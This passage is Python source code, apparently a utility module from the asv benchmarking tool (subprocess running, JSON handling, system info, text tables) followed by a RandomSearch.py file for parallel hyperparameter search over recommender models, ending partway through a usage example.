display_error : bool, optional If `True` (default) display the stdout and stderr of the subprocess when the subprocess returns an error code. shell : bool, optional If `True`, run the command through the shell. Default is `False`. return_stderr : bool, optional If `True`, return both the (stdout, stderr, errcode) as a tuple. env : dict, optional Specify environment variables for the subprocess. cwd : str, optional Specify the current working directory to use when running the process. redirect_stderr : bool, optional Whether to redirect stderr to stdout. In this case the returned ``stderr`` (when return_stderr == True) is an empty string. return_popen : bool, optional Whether to return immediately after subprocess.Popen. Returns ------- stdout, stderr, retcode : when return_stderr == True stdout : otherwise """ from .console import log # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) def get_content(header=None): content = [] if header is not None: content.append(header) if redirect_stderr: content.extend([ 'OUTPUT -------->', stdout[:-1] ]) else: content.extend([ 'STDOUT -------->', stdout[:-1], 'STDERR -------->', stderr[:-1] ]) return '\n'.join(content) if isinstance(args, six.string_types): args = [args] log.debug("Running '{0}'".format(' '.join(args))) if env and WIN and sys.version_info < (3,): # Environment keys and values cannot be unicode def _fix_env(s): return s.encode('mbcs') if isinstance(s, unicode) else s env = {_fix_env(k): _fix_env(v) for k, v in env.items()} kwargs = dict(shell=shell, env=env, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if redirect_stderr: kwargs['stderr'] = subprocess.STDOUT if WIN: kwargs['close_fds'] = False kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP else: kwargs['close_fds'] = True posix = getattr(os, 'setpgid', None) if posix: # Run the subprocess in a separate process group, so that we # can kill it and all child processes it spawns e.g. on # timeouts. Note that subprocess.Popen will wait until exec() # before returning in parent process, so there is no race # condition in setting the process group vs. 
calls to os.killpg kwargs['preexec_fn'] = lambda: os.setpgid(0, 0) proc = subprocess.Popen(args, **kwargs) if return_popen: return proc last_dot_time = time.time() stdout_chunks = [] stderr_chunks = [] is_timeout = False if log.is_debug_enabled(): debug_log = DebugLogBuffer(log) dots = False else: debug_log = lambda c: None if WIN: start_time = [time.time()] is_timeout = False def stdout_reader_run(): try: while not is_timeout: c = proc.stdout.read(1) if not c: break start_time[0] = time.time() stdout_chunks.append(c) debug_log(c) finally: proc.stdout.close() def stderr_reader_run(): try: while not is_timeout: c = proc.stderr.read(1) if not c: break start_time[0] = time.time() stderr_chunks.append(c) debug_log(c) finally: proc.stderr.close() stdout_reader = threading.Thread(target=stdout_reader_run) stdout_reader.daemon = True stdout_reader.start() all_threads = [stdout_reader] if not redirect_stderr: stderr_reader = threading.Thread(target=stderr_reader_run) stderr_reader.daemon = True stderr_reader.start() all_threads.append(stderr_reader) # Wait for reader threads threads = list(all_threads) while threads: thread = threads[0] if timeout is None: remaining = None else: remaining = timeout - (time.time() - start_time[0]) if remaining <= 0: # Timeout; we won't wait for the thread to join here if not is_timeout: is_timeout = True proc.send_signal(signal.CTRL_BREAK_EVENT) threads.pop(0) continue thread.join(remaining) if not thread.is_alive(): threads.pop(0) if is_timeout: proc.terminate() # Wait a bit for the reader threads, if they're alive for thread in all_threads: thread.join(0.1) # Wait for process to exit proc.wait() else: try: if posix and is_main_thread(): # Forward signals related to Ctrl-Z handling; the child # process is in a separate process group so it won't receive # these automatically from the terminal def sig_forward(signum, frame): _killpg_safe(proc.pid, signum) if signum == signal.SIGTSTP: os.kill(os.getpid(), signal.SIGSTOP) signal.signal(signal.SIGTSTP, sig_forward) signal.signal(signal.SIGCONT, sig_forward) fds = { proc.stdout.fileno(): stdout_chunks } if not redirect_stderr: fds[proc.stderr.fileno()] = stderr_chunks while proc.poll() is None: try: if timeout is None: rlist, wlist, xlist = select.select( list(fds.keys()), [], []) else: rlist, wlist, xlist = select.select( list(fds.keys()), [], [], timeout) except select.error as err: if err.args[0] == errno.EINTR: # interrupted by signal handler; try again continue raise if len(rlist) == 0: # We got a timeout is_timeout = True break for f in rlist: output = os.read(f, PIPE_BUF) fds[f].append(output) debug_log(output) if dots and time.time() - last_dot_time > 0.5: if dots is True: log.dot() elif dots: dots() last_dot_time = time.time() finally: if posix and is_main_thread(): # Restore signal handlers signal.signal(signal.SIGTSTP, signal.SIG_DFL) signal.signal(signal.SIGCONT, signal.SIG_DFL) if proc.returncode is None: # Timeout or another exceptional condition occurred, and # the program is still running. 
if posix: # Terminate the whole process group _killpg_safe(proc.pid, signal.SIGTERM) for j in range(10): time.sleep(0.1) if proc.poll() is not None: break else: # Didn't terminate within 1 sec, so kill it _killpg_safe(proc.pid, signal.SIGKILL) else: proc.terminate() proc.wait() proc.stdout.flush() if not redirect_stderr: proc.stderr.flush() stdout_chunks.append(proc.stdout.read()) if not redirect_stderr: stderr_chunks.append(proc.stderr.read()) proc.stdout.close() if not redirect_stderr: proc.stderr.close() debug_log(None) stdout = b''.join(stdout_chunks) stderr = b''.join(stderr_chunks) stdout = stdout.decode('utf-8', 'replace') stderr = stderr.decode('utf-8', 'replace') if is_timeout: retcode = TIMEOUT_RETCODE else: retcode = proc.returncode if valid_return_codes is not None and retcode not in valid_return_codes: header = 'Error running {0} (exit status {1})'.format(' '.join(args), retcode) if display_error: if log.is_debug_enabled(): # Output was already printed log.error(header) else: log.error(get_content(header)) raise ProcessError(args, retcode, stdout, stderr) if return_stderr: return (stdout, stderr, retcode) else: return stdout def _killpg_safe(pgid, signo): """ Same as os.killpg, but deal with OSX/BSD """ try: os.killpg(pgid, signo) except OSError as exc: if exc.errno == errno.EPERM: # OSX/BSD may raise EPERM on killpg if the process group # already terminated pass else: raise def is_main_thread(): """ Return True if the current thread is the main thread. """ if sys.version_info[0] >= 3: return threading.current_thread() == threading.main_thread() else: return isinstance(threading.current_thread(), threading._MainThread) def write_json(path, data, api_version=None, compact=False): """ Writes JSON to the given path, including indentation and sorting. Parameters ---------- path : str File name to write data : object Data to serialize as JSON api_version : int, optional API version number compact : bool, optional Whether to produce compact, non-human readable JSON. Disables sorting and indentation. """ path = os.path.abspath(path) dirname = long_path(os.path.dirname(path)) if not os.path.exists(dirname): os.makedirs(dirname) if api_version is not None: data = dict(data) data['version'] = api_version open_kwargs = {} if sys.version_info[0] >= 3: open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'w', **open_kwargs) as fd: if not compact: json.dump(data, fd, indent=4, sort_keys=True) else: json.dump(data, fd) def load_json(path, api_version=None, js_comments=False): """ Loads JSON from the given path. Parameters ---------- path : str File name api_version : str or None API version indentifier js_comments : bool, optional Whether to allow nonstandard javascript-style comments in the file. Note that this slows down the loading significantly. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) path = os.path.abspath(path) open_kwargs = {} if sys.version_info[0] >= 3: open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'r', **open_kwargs) as fd: content = fd.read() if js_comments: content = minify_json.json_minify(content) content = content.replace(",]", "]") content = content.replace(",}", "}") try: d = json.loads(content) except ValueError as e: raise UserError( "Error parsing JSON in file '{0}': {1}".format( path, six.text_type(e))) if api_version is not None: if 'version' in d: if d['version'] < api_version: raise UserError( "{0} is stored in an old file format. 
Run " "`asv update` to update it.".format(path)) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. Update " "asv to use this file.".format(path)) del d['version'] else: raise UserError( "No version specified in {0}.".format(path)) return d def update_json(cls, path, api_version): """ Perform JSON file format updates. Parameters ---------- cls : object Object containing methods update_to_X which updates the given JSON tree from version X-1 to X. path : str Path to JSON file api_version : int The current API version """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) d = load_json(path) if 'version' not in d: raise UserError( "No version specified in {0}.".format(path)) if d['version'] < api_version: for x in six.moves.xrange(d['version'] + 1, api_version + 1): d = getattr(cls, 'update_to_{0}'.format(x), lambda x: x)(d) write_json(path, d, api_version) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. " "Upgrade asv in order to use or add to " "these results.".format(path)) def iter_chunks(s, n): """ Iterator that returns elements from s in chunks of size n. """ chunk = [] for x in s: chunk.append(x) if len(chunk) == n: yield chunk chunk = [] if len(chunk): yield chunk def pick_n(items, n): """Pick n items, attempting to get equal index spacing. """ if not (n > 0): raise ValueError("Invalid number of items to pick") spacing = max(float(len(items)) / n, 1) spaced = [] i = 0 while int(i) < len(items) and len(spaced) < n: spaced.append(items[int(i)]) i += spacing return spaced def get_multiprocessing(parallel): """ If parallel indicates that we want to do multiprocessing, imports the multiprocessing module and sets the parallel value accordingly. """ if parallel != 1: import multiprocessing if parallel <= 0: parallel = multiprocessing.cpu_count() return parallel, multiprocessing return parallel, None def iter_subclasses(cls): """ Returns all subclasses of a class. """ for x in cls.__subclasses__(): yield x for y in iter_subclasses(x): yield y def hash_equal(a, b): """ Returns `True` if a and b represent the same commit hash. """ min_len = min(len(a), len(b)) return a.lower()[:min_len] == b.lower()[:min_len] def get_cpu_info(): """ Gets a human-friendly description of this machine's CPU. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/cpuinfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'model name': return val.decode('ascii') elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return check_output([sysctl, '-n', 'machdep.cpu.brand_string']).strip() return '' def get_memsize(): """ Returns the amount of physical memory in this machine. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/meminfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'MemTotal': return int(val.split()[0]) elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return int(check_output([sysctl, '-n', 'hw.memsize']).strip()) return '' def _get_terminal_size_fallback(): """ Returns a tuple (height, width) containing the height and width of the terminal. 
Fallback for when sys.get_terminal_size() doesn't exist or fails. """ try: # Unix-specific code import fcntl import termios s = struct.pack(str("HHHH"), 0, 0, 0, 0) x = fcntl.ioctl(sys.stdout, termios.TIOCGWINSZ, s) (lines, width, xpixels, ypixels) = struct.unpack(str("HHHH"), x) if lines > 12: lines -= 6 if width > 10: width -= 1 return (lines, width) except: # Fall back on environment variables, or if not set, (25, 80) try: return (int(os.environ.get('LINES')), int(os.environ.get('COLUMNS'))) except TypeError: return 25, 80 def get_terminal_width(): """ Return the terminal width, or an estimate thereof. """ try: # Python 3.3 and higher: this works under Windows and Unix return os.get_terminal_size().columns except (AttributeError, OSError): return _get_terminal_size_fallback()[1] def format_text_table(rows, num_headers=0, top_header_span_start=0, top_header_text=None): """ Format rows in as a reStructuredText table, in the vein of:: ========== ========== ========== -- top header text, span start 1 ---------- --------------------- row0col0 r0c1 r0c2 ========== ========== ========== row1col0 r1c1 r1c2 row2col0 r2c1 r2c2 ========== ========== ========== """ # Format content text_rows = [["{0}".format(item).replace("\n", " ") for item in row] for row in rows] # Ensure same number of items on all rows num_items = max(len(row) for row in text_rows) for row in text_rows: row.extend(['']*(num_items - len(row))) # Determine widths col_widths = [max(len(row[j]) for row in text_rows) + 2 for j in range(num_items)] # Pad content text_rows = [[item.center(w) for w, item in zip(col_widths, row)] for row in text_rows] # Generate result headers = [" ".join(row) for row in text_rows[:num_headers]] content = [" ".join(row) for row in text_rows[num_headers:]] separator = " ".join("-"*w for w in col_widths) result = [] if top_header_text is not None: left_span = "-".join("-"*w for w in col_widths[:top_header_span_start]) right_span = "-".join("-"*w for w in col_widths[top_header_span_start:]) if left_span and right_span: result += ["--" + " " * (len(left_span)-1) + top_header_text.center(len(right_span))] result += [" ".join([left_span, right_span])] else: result += [top_header_text.center(len(separator))] result += ["-".join([left_span, right_span])] result += headers result += [separator.replace("-", "=")] elif headers: result += headers result += [separator] result += content result = [separator.replace("-", "=")] + result result += [separator.replace("-", "=")] return "\n".join(result) def _datetime_to_timestamp(dt, divisor): delta = dt - datetime.datetime(1970, 1, 1) microseconds = (delta.days * 86400 + delta.seconds) * 10**6 + delta.microseconds value, remainder = divmod(microseconds, divisor) if remainder >= divisor//2: value += 1 return value def datetime_to_timestamp(dt): """ Convert a Python datetime object to a UNIX timestamp. """ return _datetime_to_timestamp(dt, 10**6) def datetime_to_js_timestamp(dt): """ Convert a Python datetime object to a JavaScript timestamp. """ return _datetime_to_timestamp(dt, 10**3) def js_timestamp_to_datetime(ts): """ Convert a JavaScript timestamp to a Python datetime object. """ return datetime.datetime.fromtimestamp(ts / 1000) def is_nan(x): """ Returns `True` if x is a NaN value. """ if isinstance(x, float): return x != x return False def is_na(value): """ Return True if value is None or NaN """ return value is None or is_nan(value) def mean_na(values): """ Take a mean, with the understanding that None and NaN stand for missing data. 
""" values = [x for x in values if not is_na(x)] if values: return sum(values) / len(values) else: return None def geom_mean_na(values): """ Compute geometric mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: exponent = 1/len(values) prod = 1.0 acc = 0 for x in values: prod *= abs(x)**exponent acc += x return prod if acc >= 0 else -prod else: return None def ceildiv(numerator, denominator): """Ceiling division""" return -((-numerator)//denominator) if not WIN: long_path_open = open long_path_rmtree = shutil.rmtree def long_path(path): return path else: def long_path(path): if path.startswith("\\\\"): return path return "\\\\?\\" + os.path.abspath(path) def _remove_readonly(func, path, exc_info): """Try harder to remove files on Windows""" if isinstance(exc_info[1], OSError) and exc_info[1].errno == errno.EACCES: # Clear read-only flag and try again try: os.chmod(path, stat.S_IWRITE | stat.S_IREAD) func(path) return except OSError: pass # Reraise original error six.reraise(*exc_info) def long_path_open(filename, *a, **kw): return open(long_path(filename), *a, **kw) def long_path_rmtree(path, ignore_errors=False): if ignore_errors: onerror = None else: onerror = _remove_readonly shutil.rmtree(long_path(path), ignore_errors=ignore_errors, onerror=onerror) def sanitize_filename(filename): """ Replace characters to make a string safe to use in file names. This is not a 1-to-1 mapping. The implementation needs to match www/asv.js:escape_graph_parameter """ if not isinstance(filename, six.text_type): filename = filename.decode(sys.getfilesystemencoding()) # ntfs & ext3 filename = re.sub('[<>:"/\\^|?*\x00-\x1f]', '_', filename) # ntfs forbidden = ["CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9"] if filename.upper() in forbidden: filename = filename + "_" return filename def namedtuple_with_doc(name, slots, doc): cls = collections.namedtuple(name, slots) if sys.version_info[0] >= 3: cls.__doc__ = doc return cls else: return type(str(name), (cls,), {'__doc__': doc}) def recvall(sock, size): """ Receive data of given size from a socket connection """ data = b"" while len(data) < size: s = sock.recv(size - len(data)) data += s if not s: raise RuntimeError("did not receive data from socket " "(size {}, got only {!r})".format(size, data)) return data def interpolate_command(command, variables): """ Parse a command with interpolated variables to a sequence of commands. The command is parsed as in posix-style shell (by shlex) and split to parts. Additional constructs recognized: - ``ENVVAR=value <command>``: parsed as declaring an environment variable named 'ENVVAR'. - ``return-code=value <command>``: parsed as declaring valid return codes. - ``in-dir=value <command>``: parsed as declaring working directory for command. Parameters ---------- command : str Command to execute, posix shell style. variables : dict Interpolation variables. Returns ------- command : list of str Command arguments. env : dict Environment variables declared in the command. return_codes : {set, int, None} Valid return codes. cwd : {str, None} Current working directory for the command, if any. 
""" parts = shlex.split(command) try: result = [c.format(**variables) for c in parts] except KeyError as exc: raise UserError("Configuration error: {{{0}}} not available " "when substituting into command {1!r} " "Available: {2!r}" "".format(exc.args[0], command, variables)) env = {} return_codes_set = False return_codes = {0} cwd = None while result: m = re.match('^([A-Za-z_][A-Za-z0-9_]*)=(.*)$', result[0]) if m: env[m.group(1)] = m.group(2) del result[0] continue if result[0].startswith('return-code='): if return_codes_set: raise UserError("Configuration error: multiple return-code specifications " "in command {0!r} " "".format(command)) break if result[0] == 'return-code=any': return_codes = None return_codes_set = True del result[0] continue m = re.match('^return-code=([0-9,]+)$', result[0]) if m: try: return_codes = set(int(x) for x in m.group(1).split(",")) return_codes_set = True del result[0] continue except ValueError as exc: pass raise UserError("Configuration error: invalid return-code specification " "{0!r} when substituting into command {1!r} " "".format(result[0], command)) if result[0].startswith('in-dir='): if cwd is not None: raise UserError("Configuration error: multiple in-dir specifications " "in command {0!r} " "".format(command)) break cwd = result[0][7:] del result[0] continue break return result, env, return_codes, cwd _global_locks = {} def _init_global_locks(lock_dict): """Initialize global locks in a new multiprocessing process""" _global_locks.update(lock_dict) def new_multiprocessing_lock(name): """Create a new global multiprocessing lock""" _global_locks[name] = multiprocessing.Lock() def get_multiprocessing_lock(name): """Get an existing global multiprocessing lock""" return _global_locks[name] def get_multiprocessing_pool(parallel=None): """Create a multiprocessing.Pool, managing global locks properly""" return multiprocessing.Pool(initializer=_init_global_locks, initargs=(_global_locks,)) try: from shlex import quote as shlex_quote except ImportError: _find_unsafe = re.compile(r'[^\w@%+=:,./-]').search def shlex_quote(s): """Return a shell-escaped version of the string *s*.""" if not s: return "''" if _find_unsafe(s) is None: return s # use single quotes, and put single quotes into double quotes # the string $'b is then quoted as '$'"'"'b' return "'" + s.replace("'", "'\"'\"'") + "'"
RandomSearch.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on 10/03/2018 @author: Maurizio Ferrari Dacrema """ from ParameterTuning.AbstractClassSearch import AbstractClassSearch, DictionaryKeys, writeLog from functools import partial import traceback, pickle import os, gc, math import multiprocessing from multiprocessing import Queue from queue import Empty def dump_garbage(): """ show us what's the garbage about """ # force collection print("\nGARBAGE:") gc.collect() print("\nGARBAGE OBJECTS:") for x_pos in range(len(gc.garbage)): x = gc.garbage[x_pos] s = str(x) if len(s) > 80: s = s[:80] #print("type: {} \n\t s {} \n\t reffered by: {}".format(type(x), s, gc.get_referrers(x))) print("POS: {}, type: {} \n\t s {} \n".format(x_pos, type(x), s)) print("\nDONE") pass # gc.enable() # gc.set_debug(gc.DEBUG_LEAK) import itertools, random, time def get_RAM_status(): tot_m, used_m, free_m = map(int, os.popen('free -t -m').readlines()[-1].split()[1:]) return tot_m, used_m, free_m def dereference_recommender_attributes(recommender_object): if recommender_object is None: return object_attributes = recommender_object.__dict__ for key in object_attributes.keys(): object_attributes[key] = None def get_memory_threshold_reached(max_ram_occupied_perc): if max_ram_occupied_perc is not None: tot_RAM, used_RAM, _ = get_RAM_status() max_ram_occupied_bytes = tot_RAM*max_ram_occupied_perc memory_threshold_reached = used_RAM > max_ram_occupied_bytes memory_used_quota = used_RAM/tot_RAM else: memory_threshold_reached = False memory_used_quota = 0.0 return memory_threshold_reached, memory_used_quota import sys class RandomSearch(AbstractClassSearch): ALGORITHM_NAME = "RandomSearch" def __init__(self, recommender_class, URM_test = None, evaluation_function_validation=None): super(RandomSearch, self).__init__(recommender_class, URM_test = URM_test, evaluation_function_validation= evaluation_function_validation) def build_all_cases_to_evaluate(self, n_cases): hyperparamethers_range_dictionary = self.dictionary_input[DictionaryKeys.FIT_RANGE_KEYWORD_ARGS] key_list = list(hyperparamethers_range_dictionary.keys()) # Unpack list ranges from hyperparamethers to validate onto # * operator allows to transform a list of objects into positional arguments test_cases = itertools.product(*hyperparamethers_range_dictionary.values()) paramether_dictionary_list = [] for current_case in test_cases: paramether_dictionary_to_evaluate = {} for index in range(len(key_list)): paramether_dictionary_to_evaluate[key_list[index]] = current_case[index] paramether_dictionary_list.append(paramether_dictionary_to_evaluate) # Replicate list if necessary paramether_dictionary_list = paramether_dictionary_list * math.ceil(n_cases/len(paramether_dictionary_list)) return paramether_dictionary_list def search(self, dictionary_input, metric ="map", n_cases = 30, output_root_path = None, parallelPoolSize = None, parallelize = True, save_model = "best", max_ram_occupied_perc = None): # Associate the params that will be returned by BayesianOpt object to those you want to save # E.g. 
with early stopping you know which is the optimal number of epochs only afterwards # but you might want to save it as well self.from_fit_params_to_saved_params = {} self.dictionary_input = dictionary_input.copy() self.output_root_path = output_root_path self.logFile = open(self.output_root_path + "_" + self.ALGORITHM_NAME + ".txt", "a") self.metric = metric self.model_counter = 0 if max_ram_occupied_perc is None: self.max_ram_occupied_perc = 0.7 else: # Try if current ram status is possible to read try: get_RAM_status() self.max_ram_occupied_perc = max_ram_occupied_perc except: writeLog(self.ALGORITHM_NAME + ": Unable to read RAM status, ignoring max RAM setting", self.logFile) self.max_ram_occupied_perc = None if save_model in ["no", "best", "all"]: self.save_model = save_model else: raise ValueError(self.ALGORITHM_NAME + ": save_model not recognized, acceptable values are: {}, given is {}".format( ["no", "best", "all"], save_model)) if parallelPoolSize is None: self.parallelPoolSize = 1 else: #self.parallelPoolSize = int(multiprocessing.cpu_count()/2) self.parallelPoolSize = parallelPoolSize self.best_solution_val = None self.best_solution_parameters = None self.best_solution_object = None paramether_dictionary_list = self.build_all_cases_to_evaluate(n_cases) # Randomize ordering of cases random.shuffle(paramether_dictionary_list) self.runSingleCase_partial = partial(self.runSingleCase, metric = metric) if parallelize: self.run_multiprocess_search(paramether_dictionary_list, n_cases) else: self.run_singleprocess_search(paramether_dictionary_list, n_cases) writeLog(self.ALGORITHM_NAME + ": Best config is: Config {}, {} value is {:.4f}\n".format( self.best_solution_parameters, metric, self.best_solution_val), self.logFile) return self.best_solution_parameters.copy() def update_on_new_result(self, process_object, num_cases_evaluated): paramether_dictionary_to_save = self.from_fit_params_to_saved_params_function(process_object.recommender, process_object.paramether_dictionary_to_evaluate) if process_object.exception is not None: writeLog(self.ALGORITHM_NAME + ": Exception for config {}: {}\n".format( self.model_counter, paramether_dictionary_to_save, str(process_object.exception)), self.logFile) return if process_object.result_dict is None: writeLog(self.ALGORITHM_NAME + ": Result is None for config {}\n".format( self.model_counter, paramether_dictionary_to_save), self.logFile) return self.model_counter += 1 # Always save best model separately if self.save_model == "all": print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path)) process_object.recommender.saveModel(self.output_root_path, file_name="_model_{}".format(self.model_counter)) pickle.dump(paramether_dictionary_to_save.copy(), open(self.output_root_path + "_parameters_{}".format(self.model_counter), "wb"), protocol=pickle.HIGHEST_PROTOCOL) if self.best_solution_val == None or self.best_solution_val<process_object.result_dict[self.metric]: writeLog(self.ALGORITHM_NAME + ": New best config found. 
Config {}: {} - results: {}\n".format(
                self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)

            pickle.dump(paramether_dictionary_to_save.copy(),
                        open(self.output_root_path + "_best_parameters", "wb"),
                        protocol=pickle.HIGHEST_PROTOCOL)

            self.best_solution_val = process_object.result_dict[self.metric]
            self.best_solution_parameters = paramether_dictionary_to_save.copy()

            dereference_recommender_attributes(self.best_solution_object)
            self.best_solution_object = process_object.recommender

            # Always save best model separately
            if self.save_model != "no":
                print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path))
                process_object.recommender.saveModel(self.output_root_path, file_name="_best_model")

            if self.URM_test is not None:
                self.evaluate_on_test(self.URM_test)

        else:
            writeLog(self.ALGORITHM_NAME + ": Config is suboptimal. Config {}: {} - results: {}\n".format(
                self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)

            dereference_recommender_attributes(process_object.recommender)

        #dump_garbage()

    def run_singleprocess_search(self, paramether_dictionary_list, num_cases_max):

        num_cases_evaluated = 0

        while num_cases_evaluated < num_cases_max:

            process_object = Process_object_data_and_evaluation(self.recommender_class,
                                                                self.dictionary_input,
                                                                paramether_dictionary_list[num_cases_evaluated],
                                                                self.ALGORITHM_NAME,
                                                                self.URM_validation,
                                                                self.evaluation_function_validation)

            process_object.run("main")

            self.update_on_new_result(process_object, num_cases_evaluated)
            process_object = None

            #gc.collect()
            #dump_garbage()

            num_cases_evaluated += 1

    def run_multiprocess_search(self, paramether_dictionary_list, num_cases_max):
        # The following function runs the search in parallel. As different configurations might have significantly
        # divergent runtimes, workers must be joined as each one terminates, and the result objects might be big,
        # therefore multiprocessing.Pool is not suitable

        num_cases_evaluated = 0
        num_cases_started = 0
        num_cases_active = 0
        termination_sent = False

        process_list = [None] * self.parallelPoolSize

        queue_job_todo = Queue()
        queue_job_done = Queue()

        get_memory_threshold_reached_partial = partial(get_memory_threshold_reached,
                                                       max_ram_occupied_perc=self.max_ram_occupied_perc)

        for current_process_index in range(self.parallelPoolSize):

            newProcess = multiprocessing.Process(target=process_worker,
                                                 args=(queue_job_todo,
                                                       queue_job_done,
                                                       current_process_index,
                                                       get_memory_threshold_reached_partial, ))

            process_list[current_process_index] = newProcess
            newProcess.start()
            newProcess = None

            print("Started process: {}".format(current_process_index))

        memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)

        while num_cases_evaluated < num_cases_max:

            # Create as many new jobs as needed
            # Stop if the max number of parallel processes is reached, if the max RAM occupancy is reached,
            # or if there are no other cases to explore
            # If no termination was sent and active == 0, start one job anyway, otherwise everything stalls
            # WARNING: apparently the function "queue_job_todo.empty()" is not reliable
            while ((num_cases_active < self.parallelPoolSize and not memory_threshold_reached) or (num_cases_active == 0)) \
                    and not termination_sent:

                memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)

                if memory_threshold_reached:
                    writeLog(self.ALGORITHM_NAME + ": Memory threshold reached, occupied {:.4f} %\n".format(memory_used_quota), self.logFile)

                if num_cases_started < num_cases_max and not memory_threshold_reached:

                    process_object = Process_object_data_and_evaluation(self.recommender_class,
                                                                        self.dictionary_input,
                                                                        paramether_dictionary_list[num_cases_started],
                                                                        self.ALGORITHM_NAME,
                                                                        self.URM_validation,
                                                                        self.evaluation_function_validation)

                    queue_job_todo.put(process_object)
                    num_cases_started += 1
                    num_cases_active += 1
                    process_object = None

                if num_cases_started >= num_cases_max and not termination_sent:
                    print("Termination sent")
                    queue_job_todo.put(None)
                    termination_sent = True

            # Read all completed jobs. WARNING: apparently the function "empty" is not reliable
            queue_job_done_is_empty = False

            while not queue_job_done_is_empty:

                try:
                    process_object = queue_job_done.get_nowait()

                    self.update_on_new_result(process_object, num_cases_evaluated)

                    num_cases_evaluated += 1
                    num_cases_active -= 1
                    process_object = None

                except Empty:
                    queue_job_done_is_empty = True

            time.sleep(1)

            #print("num_cases_evaluated {}".format(num_cases_evaluated))
            #print("Evaluated {}, started {}, active {}".format(num_cases_evaluated, num_cases_started, num_cases_active))

        queue_job_todo.get()

        for current_process in process_list:
            #print("Waiting to Join {}".format(current_process))
            current_process.join()
            print("Joined {}".format(current_process))


def process_worker(queue_job_todo, queue_job_done, process_id, get_memory_threshold_reached):
    "Function to be used by the process, just run the wrapper object"

    process_object = queue_job_todo.get()

    memory_threshold_warning_printed = False

    while process_object is not None:

        # # Avoid queue.put to prevent process termination until all queue elements have been pulled
        # queue.cancel_join_thread()

        # Wait until there is enough RAM
        memory_threshold_reached, memory_used_quota = get_memory_threshold_reached()

        if not memory_threshold_reached:

            memory_threshold_warning_printed = False

            process_object.run(process_id)

            # "Send" result object to main process
            queue_job_done.put(process_object)

            # Dereference
            process_object = None
            process_object = queue_job_todo.get()

        else:

            if not memory_threshold_warning_printed:
                memory_threshold_warning_printed = True
                print("Process: {} - Memory threshold reached, occupied {:.4f} %\n".format(process_id, memory_used_quota))

            time.sleep(5)

    # Ensure termination signal stays in queue
    queue_job_todo.put(None)   # Termination signal

    print("Process: {} - Termination signal received".format(process_id))

    return


class Process_object_data_and_evaluation(object):

    def __init__(self, recommender_class, dictionary_input, paramether_dictionary_to_evaluate,
                 ALGORITHM_NAME, URM_validation, evaluation_function):
        super(Process_object_data_and_evaluation, self).__init__()

        self.recommender_class = recommender_class
        self.URM_validation = URM_validation
        self.dictionary_input = dictionary_input.copy()
        self.paramether_dictionary_to_evaluate = paramether_dictionary_to_evaluate.copy()
        self.ALGORITHM_NAME = ALGORITHM_NAME
        self.evaluation_function = evaluation_function

        self.exception = None
        self.recommender = None
        self.result_dict = None

    def __del__(self):
        # self.recommender_class = None
        # self.URM_validation = None
        # self.dictionary_input.clear()
        # self.paramether_dictionary_to_evaluate = None
        # self.ALGORITHM_NAME = None
        # self.evaluation_function = None
        # self.exception = None
        # self.recommender = None
        # self.result_dict = None

        object_attributes = self.__dict__

        for key in object_attributes.keys():
            object_attributes[key] = None

    def run(self, process_id):

        try:
            # Create an object of the same class as the input,
            # passing the parameters as a dictionary
            self.recommender = self.recommender_class(*self.dictionary_input[DictionaryKeys.CONSTRUCTOR_POSITIONAL_ARGS],
                                                      **self.dictionary_input[DictionaryKeys.CONSTRUCTOR_KEYWORD_ARGS])

            print(self.ALGORITHM_NAME + ": Process {} Config: {}".format(
                process_id, self.paramether_dictionary_to_evaluate))

            self.recommender.fit(*self.dictionary_input[DictionaryKeys.FIT_POSITIONAL_ARGS],
                                 **self.dictionary_input[DictionaryKeys.FIT_KEYWORD_ARGS],
                                 **self.paramether_dictionary_to_evaluate)

            self.result_dict = self.evaluation_function(self.recommender,
                                                        self.URM_validation,
                                                        self.paramether_dictionary_to_evaluate)

            print(self.ALGORITHM_NAME + ": Process {} Completed config: {} - result {}".format(
                process_id, self.paramether_dictionary_to_evaluate, self.result_dict))

            #self.result_dict = {"map": 0.0}

            return

        except Exception as exception:

            traceback.print_exc()

            print(self.ALGORITHM_NAME + ": Process {} Exception {}".format(
                process_id, str(exception)))

            self.result_dict = None
            self.exception = exception
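

# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original file): how the search is
# typically wired together.  The hyperparameter names/ranges and the output
# path are placeholders, `evaluate_fn` stands for the validation function
# consumed by Process_object_data_and_evaluation.run(), and the recommender
# class plus URM matrices must be supplied by the caller.  Note that search()
# also relies on attributes set up by AbstractClassSearch (e.g.
# self.URM_validation), which are not visible in this excerpt.
def _random_search_example(recommender_class, URM_train, URM_test, evaluate_fn):

    dictionary_input = {
        DictionaryKeys.CONSTRUCTOR_POSITIONAL_ARGS: [URM_train],
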